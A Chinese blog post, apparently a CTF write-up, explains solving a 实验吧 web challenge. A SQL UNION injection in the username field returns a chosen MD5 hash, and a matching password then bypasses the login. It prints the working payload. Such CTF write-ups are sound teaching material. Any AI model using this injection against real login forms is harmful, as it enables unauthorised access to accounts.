• 爱因斯密
  • 猫爪

爱因斯密的猫

加密世界加密我

  • 爱因斯密
  • 猫爪

程序逻辑问题

2018年4月18日2018年4月21日实验吧, 实验吧WEBNo Comments

题目

题干链接:http://ctf5.shiyanbar.com/web/5/index.php

绕过

解题链接: http://ctf5.shiyanbar.com/web/5/index.php


解法:源码通过用户找密码做匹配,利用sql注入构造返回密码匹配输入密码。


过程

1.查看源码,查找注入点


2.因为密码有用md5进行加密,所以随意准备一个密码:1。对应的md5码:c4ca4238a0b923820dcc509a6f75849b

3.构造payload:

用户名处输入:

' union select "c4ca4238a0b923820dcc509a6f75849b"

这样对应sql查到的返回就是这个md5码

密码处输入:

1

4.拿到flag

打赏赞微海报分享
sqlsql注入代码审计
carmel0
carmel0 (12 Posts)
View all author’s posts

文章导航

Once More
变异凯撒

发表评论 取消回复

类别

  • sql技巧 (2)
  • 公告 (1)
  • 实验吧 (7)
  • 实验吧WEB (5)
  • 实验吧密码学 (2)
  • 快速记录 (2)
  • 操作技巧 (1)
  • 未分类 (1)

关键字

00截断 (1) BP技巧 (2) Cookie (1) header头 (2) HTTPS抓包 (1) php函数漏洞 (1) python解题 (2) sql (3) sqlmap (1) sql注入 (3) tamper (1) 代码审计 (2) 公告 (1) 凯撒密码 (1) 列变换 (1) 古典密码 (2) 手工注入 (1) 手机抓包 (1) 水题 (1) 测试 (1) 爆库 (1) 过滤空格 (1)

近期文章

  • 密码保护:VScode+GDB查看C栈及栈信息 2021年11月18日
  • 古典密码 2018年4月21日
  • 变异凯撒 2018年4月21日

快速链接

  • Github
  • 微信公众号
  • E-Mail

功能

  • 登录
  • 条目feed
  • 评论feed
  • WordPress.org
Proudly powered by WordPress | Theme: Doo by ThemeVS.